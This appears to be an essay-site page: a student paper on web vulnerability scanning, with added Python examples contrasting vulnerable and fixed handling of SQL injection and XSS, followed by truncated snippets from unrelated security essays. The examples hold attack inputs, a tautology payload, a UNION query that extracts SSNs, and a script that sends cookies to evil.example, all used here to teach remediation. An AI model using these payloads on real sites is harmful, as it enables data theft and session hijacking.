Methods (Acunetix and QualysGuard FreeScan)
In addition to the Nmap analysis, we conducted in-depth vulnerability assessments of the target website, http://vlab02.pneumann.com/patients13/?bill_month=9, using the commercially available Acunetix Web Vulnerability Scanner (Trial Edition) and the cloud-based QualysGuard FreeScan service. Acunetix Web Vulnerability Scanner is a robust commercial security assessment tool distributed as a download from the vendor's website. Its key components include a port scanner, an HTTP sniffer, an SQL injection tool, and a penetration-testing module capable of identifying a variety of website weaknesses, including susceptibility to buffer overflow and cross-site scripting (XSS) attacks (Acunetix, n.d.). Like Acunetix, QualysGuard FreeScan is an all-in-one vulnerability assessment tool: a cloud-based website vulnerability scanner and port scanner capable of performing over 5,000 vulnerability checks (Vacca, 2013). Both tools produce a detailed report that identifies and prioritizes potential weaknesses in the target system or website and recommends remedial actions.
Findings
The Acunetix web vulnerability scan produced a total of 26 alerts (potential vulnerabilities). An attacker could exploit the high-risk findings among them to gain access to the sensitive information in the website's database or to deface or alter the website. The scan rated three of the 26 findings as High severity because of the website's susceptibility to Structured Query Lang...
... middle of paper ...
...zed users to gain access to sensitive information. To protect private data and avoid unintended information leakage, serving the site over HTTPS (HTTP over TLS, historically SSL) encrypts traffic between the browser and the server so that it cannot be read or altered in transit. A stronger authentication mechanism, such as client certificates, would ensure that only authorized individuals who present valid credentials and proof of identity can access sensitive data.
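The following Python example is added here to illustrate the class of flaw behind the High-severity SQL injection finding reported above, and the parameterized-query remediation that the OWASP SQL Injection Prevention Cheat Sheet (Wichers, Manico & Seil, 2014) recommends. It is not code from the original paper or from the assessed site: the table, the sample rows, and the handler around the bill_month query-string parameter are assumptions constructed for the example.

```python
import sqlite3

# Constructed sample data: a toy "patients" table standing in for the
# assessed site's database. Names, SSNs and schema are invented.
SAMPLE_ROWS = [
    (1, "A. Lee",  "111-22-3333", 9),
    (2, "B. Kim",  "444-55-6666", 10),
    (3, "C. Ruiz", "777-88-9999", 11),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE patients (id INTEGER, name TEXT, ssn TEXT, bill_month INTEGER)"
    )
    conn.executemany("INSERT INTO patients VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def bills_vulnerable(conn, bill_month):
    """VULNERABLE (hypothetical handler): the raw query-string value is
    spliced into the SQL text, so whatever the client sends is parsed as SQL."""
    sql = "SELECT id, name FROM patients WHERE bill_month = " + bill_month
    return conn.execute(sql).fetchall()


def bills_parameterized(conn, bill_month):
    """FIXED: validate the value against what the application expects (an
    integer month) and pass it as a bound parameter, so the database engine
    never parses it as SQL."""
    try:
        month = int(bill_month)
    except (TypeError, ValueError):
        raise ValueError("bill_month must be an integer")
    if not 1 <= month <= 12:
        raise ValueError("bill_month must be between 1 and 12")
    return conn.execute(
        "SELECT id, name FROM patients WHERE bill_month = ?", (month,)
    ).fetchall()


# Constructed attacker inputs for the bill_month parameter.
TAUTOLOGY = "9 OR 1=1"                                  # returns every row
UNION_EXFIL = "0 UNION SELECT ssn, name FROM patients"  # pulls SSNs into the result


if __name__ == "__main__":
    db = make_db()
    print("honest request:   ", bills_vulnerable(db, "9"))
    print("tautology payload:", bills_vulnerable(db, TAUTOLOGY))
    print("union payload:    ", bills_vulnerable(db, UNION_EXFIL))
    print("parameterized:    ", bills_parameterized(db, "9"))
    try:
        bills_parameterized(db, TAUTOLOGY)
    except ValueError as exc:
        print("parameterized rejects payload:", exc)
```

The tautology payload turns a one-patient lookup into a dump of the whole table, and the UNION payload pulls the SSN column into a result set that was only supposed to carry ids and names. The fix does two things: the bound parameter makes injection impossible regardless of input, and the allow-list check on top rejects anything that is not a month, which is the defense-in-depth the cheat sheet recommends.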
Works Cited
Goodrich, M. T., & Tamassia, R. (2011). Introduction to Computer Security. Boston, MA: Pearson.
Vacca, J. R. (2013). Computer and Information Security Handbook. Waltham, MA: Morgan Kaufmann.
Wichers, D., Manico, J., & Seil, M. (2014, April 14). SQL Injection Prevention Cheat Sheet. Retrieved from https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
A developer for Aim Higher College is creating a web server form for submitting calendar events to the college's event calendar. First, consider the types of attack to which the web server would be vulnerable. The server could fall into the wrong hands or face cross-site scripting (XSS) attacks, in which the attacker steals important client information; it could also be slowed down and flooded with a large volume...
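As an added example that is not part of the original essay, the following Python code models the calendar-event form above: one renderer pastes submitted values straight into HTML (the stored XSS the essay warns about) and the other encodes them for the context they land in, with server-side validation in front. The form fields, the room-code format, and the submissions are assumptions constructed for the example.

```python
import html
import re

# Constructed submissions to the hypothetical calendar-event form. The second
# one carries a script payload in the title and an attribute breakout in the
# room field, the shape of input a stored-XSS attacker would submit.
SUBMISSIONS = [
    {"title": "Open house", "room": "B-101"},
    {"title": "<script>fetch('https://evil.example/?c='+document.cookie)</script>",
     "room": 'B-102" onmouseover="alert(1)'},
]

# Assumed room-code format for the allow-list check.
ROOM_RE = re.compile(r"^[A-Z]-\d{3}$")


def validate_event(event):
    """Server-side input validation: allow-list the room code and bound the
    title length. Validation alone cannot make free text like a title safe,
    which is why render_safe still encodes on output."""
    if not ROOM_RE.fullmatch(event["room"]):
        raise ValueError("invalid room code")
    if not 1 <= len(event["title"]) <= 120:
        raise ValueError("title length out of range")
    return event


def render_unsafe(events):
    """VULNERABLE: submitted values are pasted into the HTML without encoding,
    so a stored payload runs in every visitor's browser that loads the calendar."""
    items = [f'<li data-room="{e["room"]}">{e["title"]}</li>' for e in events]
    return "<ul>" + "".join(items) + "</ul>"


def render_safe(events):
    """FIXED: every untrusted value is HTML-encoded for the context it is
    placed in. quote=True also encodes the double quote, which closes the
    attribute-breakout trick used in the 'room' field."""
    items = [
        f'<li data-room="{html.escape(e["room"], quote=True)}">'
        f'{html.escape(e["title"], quote=True)}</li>'
        for e in events
    ]
    return "<ul>" + "".join(items) + "</ul>"


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SUBMISSIONS))
    print("safe:  ", render_safe(SUBMISSIONS))
    for event in SUBMISSIONS:
        try:
            validate_event(event)
            print("accepted:", event["title"])
        except ValueError as exc:
            print("rejected:", exc)
```

The encoded page still contains the attacker's text, but as inert characters (`&lt;script&gt;`, `&quot;`) rather than markup; that is the property to check for, since stripping or blocking "bad" strings on input is what validation cannot do reliably for free text.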
Created by Philip Zimmermann in 1991, this program (PGP) has been widely used throughout the global computer community to protect the confidentiality and integrity of users' data, allowing them to deliver messages and files privately to the intended recipient or an authorized person (Singh, 2012). Beyond its usefulness to individuals as a privacy-ensuring program, it has also been adopted by many corporations to protect company data from falling into the wrong hands (Rouse, 2005).
CVSS, the Common Vulnerability Scoring System, provides a method for assessing and prioritizing vulnerabilities that have been identified in an application's code so that IT management can address them (Scarfone & Mell, 2007). CCSS, the Common Configuration Scoring System, uses metrics similar to CVSS but is focused on weaknesses that arise from decisions about the security configuration of the software.
Noam Arzt identified various threats to patient privacy in the use of Immunization Information Systems (IIS). He divided these threats into three categories: desktop threats, server threats, and network threats. Desktop threats relate to the user's desktop, whether a terminal or a personal computer; server threats relate to the IIS server and its integrity; and network threats relate to the network that connects user desktops to IIS servers (Arzt,
1.) (3 points) The US Computer Emergency Readiness Team (US-CERT) publishes Technical Cyber Security Alerts and Vulnerability Notes; these documents alert users to potential threats to the security of their systems. Select a Technical Security Alert or Vulnerability Note published in the last twelve months that has a network-related component, and research the reported problem and the suggested solution (if one is available). Analyze and describe the problem and the solution, paying close attention to the network-related issues it raises. We are interested in reading your analysis, not a cut-and-paste of what is on the website. The listing of recent Technical Security Alerts can be found at http://www.us-cert.gov/cas/techalerts/ and the listing of Vulnerability Notes at http://www.kb.cert.org/vuls
"Evolutions in Browser Security." NSS Labs. N.p., 28 Oct. 2013. Web. 19 Oct. 2014. <https://www.nsslabs.com/reports/evolutions-browser-security>.
The Internet offers many advantages and new things to learn and experience, but it carries a risk of personal information leakage. Even a simple browsing history can reveal our most private interests. Hence, laws and legislation have been enacted to protect confidential information; they act as a barrier and protector against any unwanted outflow of information to computer criminals.
Apache Struts is an open-source framework for developing Java-based web applications, covering both the front and back ends of a site. Equifax used it to let customers interact with its systems. It was established that Apache Struts had a vulnerable plugin. Whenever a customer interacted with the system, this plugin pulled in a library called XStream, which converts XML data into Java objects. The attackers embedded their own carefully crafted code in those Java objects and used it to manipulate the Equifax server running XStream (Bomey, Dastagir, Shell, par.
Risk assessment identifies an organization's potential risks and threats; by analyzing these threats, countermeasures are prepared to respond to and eliminate the hazard. In the article by Blanke and McGrady (2016), the researchers identify a checklist of several known risks that most of us are comfortable with until they disrupt our services. Risks include any online device, such as portable laptops, tablets, printers, and smart devices, as well as insiders and physical breaches. In this case healthcare information is proprietary information that must be protected from cyber-attacks and requires a robust cybersecurity risk management framework. The checklist identifies three known vulnerabilities and threats drawn from known healthcare breaches. Risk assessment analyzes the risk in order to develop security controls based on the types of risk the organization may encounter, e.g., malware, ransomware, spyware, and denial-of-service techniques, which are among the most common types of cyber attack. Risk assessment will ensure that all vulnerabilities and threats are assessed when conducting my research.
Penetration testing uses tools and processes to scan the network environment for vulnerabilities [03& T, J.K et al. 2002]; there are many different types of vulnerability assessment. Penetration testing focuses on understanding the vulnerabilities of the components you have made available on the network, as seen from the perspective of a skilful and determined attacker who has access to that network. It will provide a thorough overview of the ...
“In order to establish trust or confidence, there must be some binding of unique attributes in the website that will identify the unique identity. If a website has some elements of trust, this is commonly called authentication and will provide a trust relationship to the users” (Andert et al. 2002)
Nessus is an efficient, comprehensive vulnerability scanner that produces fewer false positives than many other tools currently available in th...
For thousands of years, cryptography and encryption have been used to secure communication, with military communication leading both their use and their advancement. Since the start of the Internet there has been a far greater need for cryptography. Although computers existed well before then, there was no widespread market for them until the late 1980s, and the World Wide Web was invented in 1989. This new method of communication created a large need for information security: the Internet allows people to exchange sensitive information, and if that information falls into the wrong hands it can cause many problems for the person concerned.
Malicious code is a real danger to modern systems. Most systems today do not work in isolation; they are usually connected to other systems and are sometimes dependent on them. An attack on one system in a network is therefore a potential attack on every other system it interacts with, and any networked or Internet-connected computer will inevitably have to deal with malicious code at some point. Businesses lose billions of dollars each year to malicious code attacks, and responding to an attack and restoring all the data on affected computers is a time-consuming and expensive task. It is far better to prevent such attacks by organizing and maintaining effective defenses. However, there is no single solution that prevents every attack. Attackers constantly look for new ways to take advantage of known vulnerabilities and to find new ones, so organizations must not only defend against existing attack methods but also try to anticipate and prevent new techniques. Computer and network security is therefore a never-ending challenge and expense.
In this era, when the Internet provides essential communication between tens of millions of people and is increasingly used as a tool for commerce, security becomes a tremendously important issue to deal with. There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. One essential aspect of secure communication is cryptography. It is important to note, however, that while cryptography is necessary for secure communication, it is not by itself sufficient. Cryptography is the science of writing in secret code and is an ancient art; in earlier times people sent encoded messages that could be understood only by a receiver who knew the symbols and their meanings. The first documented use of cryptography in writing dates back to circa 1900 B.C., when an Egyptian scribe used non-standard hieroglyphs in an inscription. Once writing was invented, cryptography appeared spontaneously, with applications ranging from diplomatic missives to wartime battle plans. It is no surprise, then, that new forms of cryptography came soon after the widespread development of computer communications. In telecommunications and data communications, cryptography is necessary when communicating over any untrusted medium, which includes any network, particularly the Internet [1]. Within the context of any application-to-application communication, there are some security requirements, including: